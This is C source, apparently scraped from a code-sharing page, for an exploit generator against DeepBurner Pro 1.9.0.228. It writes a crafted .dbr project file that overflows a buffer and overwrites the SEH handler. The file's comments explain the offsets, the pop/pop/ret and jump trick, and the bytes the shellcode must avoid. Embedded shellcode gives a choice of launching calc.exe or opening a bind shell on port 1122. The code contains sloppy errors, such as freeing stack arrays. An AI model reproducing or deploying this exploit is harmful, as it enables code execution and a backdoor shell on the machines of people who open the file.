268 lines
No EOL
16 KiB
C
268 lines
No EOL
16 KiB
C
/* Deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)
|
|
[~]This is buffer: {[header] 253 bytes + (junk+ next seh + seh addr) + [tail] 957 bytes} dbr/dbi file
|
|
[~]Date: 29.01.2010
|
|
[~]Dicovery Credits: fl0 fl0w
|
|
[~]Exploit Credits : fl0 fl0w
|
|
[?]Download latest vuln vs from: http://www.deepburner.com/?r=download
|
|
[?]Compilation: deepburner.c.......Win32(cygwin,Devcpp)
|
|
[!]How do I exploit this? well overwriting a seh handler ,the offset is at 529 bytes from the beggining
|
|
of my buffer, nseh is at seh-4 bytes whitch a overwrite with a jmp instruction ,after I reposition my
|
|
payload in memory(seh->pop/pop/ret | nseh->jmp 9 bytes).
|
|
[!]Alternative solution, ESI points somewhere's in memory that I control,so theoretically you could do the
|
|
following: pop esi
|
|
pop edi
|
|
retn
|
|
call esi
|
|
The problem is that ESI address keeps changing ,I tryed to guess a interval ,as it seems the probablity of
|
|
guessing a right address is low aldo this vs of the exploit works 100% every time.
|
|
Overwrite seh handler address with pop/pop/retn ,retn instr gets EIP to point to next instruction witch is
|
|
the address that next seh handler points to witch will be the address that ESI points to resulting in code execution.
|
|
[!]When u generate shellcode make sure to avoid these caracters: 0x00 0x3c 0x3e 0x0a 0x0d 0x22 0x2F.
|
|
[!] */
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
void gen_random(char*,const int);
|
|
void cpy_eip(char*,int,unsigned int);
|
|
unsigned int getFsize(FILE*,char*);
|
|
int cpy(char*,char*);
|
|
void print(char*);
|
|
void buildfile(char*);
|
|
void banner();
|
|
void shellprint();
|
|
#define VER "1.9.0.228"
|
|
#define POCNAME "deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)"
|
|
#define AUTHOR "fl0 fl0w"
|
|
#define VULNF "testfile.dbr"
|
|
#define IF(x,NULL) if(x==NULL)
|
|
#define FOR(i,a,b) for(i=a;i<b;++i)
|
|
#define WHILE(z) while(z>0)
|
|
#define SEH_OFFSET 276
|
|
#define NEXTSEH_OFFSET 272
|
|
char dbrheader[]={
|
|
0x3C, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65, 0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F,
|
|
0x72, 0x64, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x2E, 0x38, 0x2E, 0x30, 0x2E, 0x32, 0x32,
|
|
0x34, 0x22, 0x20, 0x74, 0x79, 0x70, 0x65, 0x3D, 0x22, 0x64, 0x61, 0x74, 0x61, 0x22, 0x3E, 0x2E,
|
|
0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x20,
|
|
0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x64, 0x65, 0x76, 0x69, 0x63, 0x65, 0x3D, 0x22,
|
|
0x22, 0x20, 0x73, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x32, 0x69, 0x6D, 0x70, 0x6F, 0x72, 0x74,
|
|
0x3D, 0x22, 0x30, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F, 0x64, 0x69,
|
|
0x73, 0x63, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F,
|
|
0x74, 0x72, 0x61, 0x63, 0x6B, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x61, 0x62,
|
|
0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x5F, 0x69, 0x6D, 0x61, 0x67,
|
|
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20,
|
|
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x69, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
|
|
0x22, 0x43, 0x44, 0x52, 0x6F, 0x6F, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22,
|
|
0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
|
|
0x20, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74, 0x65, 0x73,
|
|
0x74, 0x2E, 0x74, 0x78, 0x74, 0x22, 0x20, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22,
|
|
};
|
|
char dbrtail[]={0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
|
|
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x69, 0x72, 0x3E, 0x0D, 0x0D,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x3E,
|
|
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62, 0x65,
|
|
0x6C, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x7A, 0x6F, 0x6F, 0x6D, 0x3D, 0x22,
|
|
0x30, 0x22, 0x20, 0x76, 0x69, 0x65, 0x77, 0x3D, 0x22, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x22, 0x20,
|
|
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x74,
|
|
0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x6C,
|
|
0x61, 0x62, 0x65, 0x6C, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
|
|
0x20, 0x20, 0x20, 0x3C, 0x66, 0x72, 0x6F, 0x6E, 0x74, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
|
|
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x62, 0x61, 0x63, 0x6B, 0x20, 0x2F, 0x3E,
|
|
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62,
|
|
0x65, 0x6C, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x61, 0x75, 0x74, 0x6F,
|
|
0x72, 0x75, 0x6E, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x75, 0x73, 0x65, 0x3D,
|
|
0x22, 0x30, 0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
|
|
0x3C, 0x6D, 0x61, 0x69, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x61, 0x69, 0x6E,
|
|
0x46, 0x6F, 0x72, 0x6D, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F, 0x70, 0x61, 0x74, 0x68,
|
|
0x3D, 0x22, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D,
|
|
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x74, 0x69, 0x74, 0x6C, 0x65,
|
|
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x74, 0x65,
|
|
0x78, 0x74, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D,
|
|
0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x20, 0x62, 0x6F, 0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74,
|
|
0x3D, 0x22, 0x31, 0x34, 0x34, 0x22, 0x20, 0x74, 0x6F, 0x70, 0x3D, 0x22, 0x34, 0x38, 0x22, 0x20,
|
|
0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x35, 0x37, 0x22, 0x20, 0x68, 0x65, 0x69, 0x67, 0x68,
|
|
0x74, 0x3D, 0x22, 0x33, 0x33, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
|
|
0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E,
|
|
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22, 0x32, 0x30, 0x22, 0x20,
|
|
0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35, 0x35, 0x22, 0x20,
|
|
0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74,
|
|
0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
|
|
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,
|
|
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x22,
|
|
0x20, 0x74, 0x65, 0x78, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x22, 0x20,
|
|
0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x20, 0x62, 0x6F,
|
|
0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x34, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
|
|
0x3D, 0x22, 0x37, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x38, 0x39, 0x22,
|
|
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x39, 0x22, 0x20, 0x66, 0x6F, 0x6E,
|
|
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77,
|
|
0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65,
|
|
0x3D, 0x22, 0x31, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D,
|
|
0x22, 0x32, 0x35, 0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31,
|
|
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20,
|
|
0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x65,
|
|
0x78, 0x69, 0x74, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
|
|
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67,
|
|
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F,
|
|
0x64, 0x6F, 0x77, 0x6E, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x74, 0x65, 0x78,
|
|
0x74, 0x3D, 0x22, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x45,
|
|
0x78, 0x69, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D,
|
|
0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x31, 0x32, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
|
|
0x3D, 0x22, 0x39, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x37, 0x35, 0x22,
|
|
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E,
|
|
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53,
|
|
0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22,
|
|
0x38, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35,
|
|
0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66,
|
|
0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
|
|
0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x61, 0x75, 0x74, 0x6F, 0x72, 0x75, 0x6E,
|
|
0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x3C, 0x2F, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65,
|
|
0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F, 0x72, 0x64, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
|
|
};
|
|
struct {
|
|
char* shellNAME;
|
|
int size;
|
|
char* shellTYPE;
|
|
}scode[]={ {"Execute calc.exe",164,
|
|
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" //164 bytes
|
|
"\x6b\x48\x82\x83\xeb\xfc\xe2\xf4\xf4\x83\x0c\x82\x08\x6b\xc3\xc7"
|
|
"\x34\xe0\x34\x87\x70\x6a\xa7\x09\x47\x73\xc3\xdd\x28\x6a\xa3\xcb"
|
|
"\x83\x5f\xc3\x83\xe6\x5a\x88\x1b\xa4\xef\x88\xf6\x0f\xaa\x82\x8f"
|
|
"\x09\xa9\xa3\x76\x33\x3f\x6c\x86\x7d\x8e\xc3\xdd\x2c\x6a\xa3\xe4"
|
|
"\x83\x67\x03\x09\x57\x77\x49\x69\x83\x77\xc3\x83\xe3\xe2\x14\xa6"
|
|
"\x0c\xa8\x79\x42\x6c\xe0\x08\xb2\x8d\xab\x30\x8e\x83\x2b\x44\x09"
|
|
"\x78\x77\xe5\x09\x60\x63\xa3\x8b\x83\xeb\xf8\x82\x08\x6b\xc3\xea"
|
|
"\x34\x34\x79\x74\x68\x3d\xc1\x7a\x8b\xab\x33\xd2\x60\x9b\xc2\x86"
|
|
"\x57\x03\xd0\x7c\x82\x65\x1f\x7d\xef\x08\x29\xee\x6b\x45\x2d\xfa"
|
|
"\x6d\x6b\x48\x82"
|
|
},
|
|
{ "bind shell on port 1122",709,
|
|
|
|
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
|
|
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
|
|
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
|
|
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
|
|
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
|
|
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
|
|
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
|
|
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
|
|
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
|
|
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
|
|
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
|
|
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
|
|
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
|
|
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
|
|
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
|
|
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
|
|
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
|
|
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
|
|
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
|
|
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
|
|
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
|
|
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
|
|
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
|
|
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
|
|
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
|
|
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
|
|
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
|
|
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
|
|
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
|
|
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
|
|
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
|
|
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
|
|
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
|
|
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
|
|
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
|
|
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
|
|
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
|
|
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
|
|
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
|
|
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
|
|
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
|
|
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
|
|
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
|
|
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
|
|
"\x4f\x4f\x42\x4d\x5a"},
|
|
{NULL,NULL}
|
|
};
|
|
int j;
|
|
int main(){
|
|
banner();
|
|
shellprint();
|
|
buildfile(VULNF);
|
|
print("Done!");
|
|
//sleep()
|
|
getchar();
|
|
return 0;
|
|
}
|
|
void buildfile(char* fname){
|
|
char seh[]="\xAF\x20\x36\x02";
|
|
char nseh[]="\xeb\x09\x90\x90";
|
|
scanf("%d",&j);
|
|
char buffer[1000000];
|
|
gen_random(buffer,999999);
|
|
memcpy(buffer+SEH_OFFSET,seh,4);
|
|
memcpy(buffer+NEXTSEH_OFFSET,nseh,4);
|
|
memset(buffer+SEH_OFFSET+4,0x90,10);
|
|
switch(j){
|
|
case 0:
|
|
memcpy(buffer+SEH_OFFSET+14,scode[0].shellTYPE,strlen(scode[0].shellTYPE));
|
|
break;
|
|
case 1:
|
|
memcpy(buffer+SEH_OFFSET+14,scode[1].shellTYPE,strlen(scode[1].shellTYPE));
|
|
break;
|
|
default: print("Error with shellcode");exit(0);
|
|
}
|
|
FILE* f=fopen(fname,"wb");
|
|
IF(f,NULL){ print("error writing file");exit(0);}
|
|
fprintf(f,"%s%s%s",dbrheader,buffer,dbrtail);
|
|
fclose(f);
|
|
free(dbrheader);
|
|
free(dbrtail);
|
|
free(buffer);
|
|
printf("[!]File is:%d bytes\n",getFsize(f,VULNF));
|
|
}
|
|
void banner(){
|
|
printf("[$]%s\n[$]Vs %s\n[$]%s\n",POCNAME,VER,AUTHOR);
|
|
}
|
|
void shellprint(){
|
|
int i;
|
|
print("Chose you shellcode(press 0 || 1)");
|
|
for(i=0;i<2;i++)
|
|
printf("[~]%s of %d length %d\n",scode[i].shellNAME,scode[i].size,i);
|
|
}
|
|
void gen_random(char *s, const int len)
|
|
{ int i; //helps u find the offsets
|
|
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
|
|
|
|
FOR(i,0,len)
|
|
{
|
|
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
|
|
}
|
|
s[len]=0;
|
|
}
|
|
unsigned int getFsize(FILE* g,char* gname)
|
|
{
|
|
unsigned int s;
|
|
|
|
g=fopen(gname,"rb");
|
|
|
|
IF(g,NULL)
|
|
{
|
|
print("File error at reading");
|
|
exit(0);
|
|
}
|
|
fseek(g,0,SEEK_END);
|
|
s=ftell(g);
|
|
|
|
return s;
|
|
}
|
|
int cpy(char* source,char* dest)
|
|
{
|
|
int len;
|
|
len=strlen(source);
|
|
memcpy(dest,&source,len+1);
|
|
return len;
|
|
}
|
|
void print(char* msg)
|
|
{
|
|
printf("[*]%s\n",msg);
|
|
} |